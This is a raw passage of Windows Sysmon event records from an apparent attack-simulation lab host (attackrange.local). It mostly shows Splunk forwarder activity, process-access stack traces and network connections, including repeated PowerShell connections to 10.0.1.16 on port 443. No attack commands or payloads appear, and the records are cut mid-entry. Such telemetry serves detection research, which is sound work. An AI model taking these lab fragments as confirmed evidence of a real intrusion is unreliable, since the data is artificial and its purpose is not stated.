13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:01.034{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C91144C272E138881E9156C6065D339,SHA256=F6D3593133DB9456B6664A83EBB2B77599E06E1D20AE0D5F1705B53DCCD839B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:02.102{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D0E6DE69FA2C719913B17683B9F9248,SHA256=A35388380235274AE786066141A71B7D4B3D8D7C2F4BB14136FB836E5BF49B96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:03.518{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CD34372CA12403E6316CF04AB13D3846,SHA256=6114F7217510C0E464DB00DB6F9DE950C93DC34E512182A67A6B0CD75C7C6E16,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:03.153{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=665F1A65D17C63254F5654E9D4A85AA9,SHA256=D633F37B38FAB9F65698F7FDBC9ADCD2768FA1398C87239B36342E064A9D8509,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036496434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:32.881{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50408-false10.0.1.12-8000- 23542300x800000000000000036496438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:04.186{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84A4776F4391E831693EF04F9F0158A3,SHA256=F7CF2F49615A83BD4FBF0F931975AF8A91F81BB39FD5FDC146D4AAE51F924629,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:33.981{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50409-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:05.233{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEDBB61A7EDD4A8986BE2E10031629C9,SHA256=6D7A4B10EA3E25502C6B86B3C80CA8BB731263272CE45E7B3A90E3DCCFD8D247,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:06.986{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF20CB1D7D0A82340CC5DAA744251FB6,SHA256=92FA13308D117BDDCA454878BF794B40328FC0CA411A923A5451CC6BD443EB91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:06.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDD06FF7FA19450EF371AD3F8F4AFDC0,SHA256=799A6F52A6252649382223EA152B4FA3F9C276595A11A13C41F8DD9E73119002,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:06.251{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6F80C9AAAA08A5AA2ED49757DE0053B,SHA256=37B78212E53A772BF20B2FD3AD285FFC3A1117F23CE5AB9765B7A1BDD52BE6F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000036496440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:12:06.001{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a96a-0x1da9da23) 23542300x800000000000000036496445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:07.270{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=505C6DC7AADB325421766D7BC28F6385,SHA256=456CCAE6511368412FFBC94481E83D049F8FD201AC026CB03F3AAC6ECAD332B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.664{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local123ntpfalse10.0.1.14WIN-DC-128123ntp 10341000x800000000000000036496463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.684{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FA8-6140-5A56-04000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:08.684{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.684{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:08.684{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.684{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:08.684{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9FA8-6140-5A56-04000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.684{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FA8-6140-5A56-04000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.669{B81B27B7-9FA8-6140-5A56-04000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.300{B81B27B7-9FA8-6140-5956-04000000C801}44045356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.284{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD17338C14B20FF3ACB33B7572FE82EE,SHA256=08CD79E27BF3A7B8D7B462E22C13153A8552F65031F13A5BDD21F49DBB0C1830,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=86E15DA80BABDAC41283AC2A1F3BA96A,SHA256=5B72FA76A3FFC8C922FC59D4344CA6CA394B32EEEE8A9FEC076BBFB83DB31EE7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:29.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F339181BDFDA1172C785E4FC515874AF,SHA256=DAC3DEA52C4F4139D9D1820B3A5E28A7F5F0AE3D00058D01DC004D2F1781C5EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:30.904{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3201EF6942CF1E7CB67A9CB3B795436,SHA256=91FFF1003CFA707887E7DC60AA674C6D9D4CE283E8BE41A29D0C26390B3DCA44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:31.904{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B7022B6A7424B160EECE94856891120,SHA256=CE20A1839C23F3BDA4ECCA6BFCF1BE2944ECF161C712F8BDB8CDC4377650798D,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000036496525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:32.919{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=649E68570347B45F58D2B89287F209F4,SHA256=74644E924C8B5CB63CC86C6D91A6436E6D354B7A5CFB37823B03622A11355412,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:01.915{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50419-false10.0.1.12-8000- 23542300x800000000000000036496523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:32.420{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:33.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C67DC0DA78DE45D7A422D909B39569D5,SHA256=F09DB41B7ED93A057AEF4C23502AA62775CD6AC8590FBC5D702CAEF9DD685478,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036496526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:04.084{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50420-false10.0.1.12-8089- 23542300x800000000000000036496529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:34.956{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3511B86BF9F5C0E04CC9C044EA97CFCB,SHA256=A0921B35C126D5FF34B41F6EF8D7CCBAF028158CE6B5FF8FD8857D18925C67A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:34.439{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EB8AE4E226AD65D76BFAADFEA1AFF25F,SHA256=C1088A1532A2C6F0DD6A90C5205412748609CBB0AF309C6351DE213100C274C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:35.971{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B4A0847F2C582BF3ED4211BF47547FD,SHA256=5FD150925D2B2B3BB1624F3346FCBF83DDCF6C2D13E8DE11651108CFC0A83224,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036496530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:05.084{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50421-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036496540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.884{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FC5-6140-5D56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.884{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:37.884{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 